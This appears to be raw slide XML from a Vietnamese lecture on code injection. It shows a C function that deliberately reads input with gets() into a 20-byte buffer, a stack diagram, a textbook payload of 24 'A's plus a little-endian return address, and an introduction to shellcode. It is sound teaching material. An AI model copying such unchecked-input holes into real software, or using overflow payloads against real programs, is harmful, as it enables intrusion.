            <a:ext cx="3471000" cy="1169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void vulnerable(void) {</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char name[20];</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gets(name);</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21" name="Google Shape;783;p67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{597A3D9B-5AD3-FB0A-C4EE-6BA136984126}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513575" y="1143000"/>
            <a:ext cx="2676600" cy="1169521"/>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Giả</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> sử kẻ tấn công muốn thực </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>thi lệnh</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> được lưu trong vùng nhớ bắt đầu ở địa chỉ </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>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0xdeadbeef</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Google Shape;784;p67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE7925E8-93C4-7F1F-3280-F85A8A7B630F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="8158200" y="4869150"/>
            <a:ext cx="1228800" cy="4002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600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Google Shape;785;p67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{575EC220-E3E3-4EFE-7EA7-BA85C42F86F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8772600" y="4302450"/>
            <a:ext cx="0" cy="483300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="595959"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24" name="Google Shape;786;p67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76A65666-D163-850A-4E2F-6D39FF4079C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8772600" y="5342850"/>
            <a:ext cx="0" cy="474125"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="595959"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Google Shape;789;p67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F86BC0C-4B48-27B9-9243-E4F5F07C6A79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513575" y="3472312"/>
            <a:ext cx="2676600" cy="677078"/>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600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>K</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>ẻ tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> công đưa giá trị đầu vào nào cho hàm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gets</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Google Shape;790;p67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90D635BA-0B6D-F63D-54B7-766494FEF455}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="524676" y="2425313"/>
            <a:ext cx="2676600" cy="677078"/>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Kẻ tấn công muốn ghi đè giá trị nào lên RIP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="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p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="29" name="Table 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4959363D-E12B-83B8-080E-1D6015044CB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="882621388"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6365925" y="1244975"/>
          <a:ext cx="2264500" cy="4572000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{22838BEF-8BB2-4498-84A7-C5851F593DF1}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="566125">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="46736303"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="566125">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4047237489"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="566125">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3963183214"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="566125">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4143032466"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>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54999">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4999">
                <a:tc gridSpan="4">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1400" b="1">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>RIP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28247063"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="254999">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latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>SFP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79067642"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="254999">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7166735"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="254999">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12917789"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="254999">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95081718"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="254999">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52744238"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="254999">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90174867"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Google Shape;788;p67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7453DF00-C056-4582-E802-2EBEB2384689}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8572500" y="3626319"/>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RIP</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="1">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Google Shape;788;p67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DC3475B-68B1-F247-0373-A1D713C97444}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8572500" y="3916588"/>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SFP</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="1">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="137907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F73E-0888-4229-9747-63A7D9D36F8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Code Injection – Ví dụ</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDEE61B7-1082-406D-BDE3-2B84A94349A5}"/>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20" name="Google Shape;782;p67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3832B24-98D1-D468-6867-348D9E3E5A23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="5045329"/>
            <a:ext cx="3471000" cy="1169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void vulnerable(void) {</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char name[20];</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gets(name);</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22" name="Google Shape;784;p67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE7925E8-93C4-7F1F-3280-F85A8A7B630F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="8158200" y="4882475"/>
            <a:ext cx="1228800" cy="4002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600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:endParaRPr sz="1600" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Google Shape;785;p67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{575EC220-E3E3-4EFE-7EA7-BA85C42F86F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8772600" y="4315775"/>
            <a:ext cx="0" cy="483300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="595959"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24" name="Google Shape;786;p67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76A65666-D163-850A-4E2F-6D39FF4079C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8772600" y="5356175"/>
            <a:ext cx="0" cy="474125"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="595959"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="29" name="Table 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4959363D-E12B-83B8-080E-1D6015044CB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3349640723"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5753104" y="1249940"/>
          <a:ext cx="2714397" cy="458036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marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1400" b="1">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>'\x00'</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'\xef'</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'\xbe'</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'\xad'</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'\xde'</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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Google Shape;788;p67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7453DF00-C056-4582-E802-2EBEB2384689}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8572500" y="3639644"/>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RIP</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="1">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Google Shape;788;p67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DC3475B-68B1-F247-0373-A1D713C97444}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8572500" y="3929913"/>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SFP</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="1">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Google Shape;797;p68">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2CA8DAA-57BD-486F-D9D1-875A3C28F775}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="198500" y="914400"/>
            <a:ext cx="4754500" cy="3997604"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" vert="horz" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" rtlCol="0" anchor="t" anchorCtr="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457200" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Đầu vào: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'A' * 24</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'\xef\xbe\xad\xde’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="731520" lvl="1" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Ghi 24 byte vào name và SFP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="731520" lvl="1" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Ghi địa chỉ của lệnh muốn thực thi vào RIP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Làm cách nào để thực thi các lệnh không nằm trong bộ nhớ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1005840" lvl="2" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Sử dụng Shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="422440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027A-F2E5-3276-8367-D94C4474940B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5A94B1E-8F27-959F-E74A-7056AA22BDBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1066800"/>
            <a:ext cx="8153400" cy="5410200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Shellcode: mã độc được chèn vào bộ nhớ để khai thác lỗ hổng</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Tạo ra và thực thi lệnh shell của HĐH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Đây là cách thức phổ biến nhất để thực thi mã độc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{298750F0-45D5-EB90-09E9-0B64780A5D31}"/>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6" name="Google Shape;814;p69">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
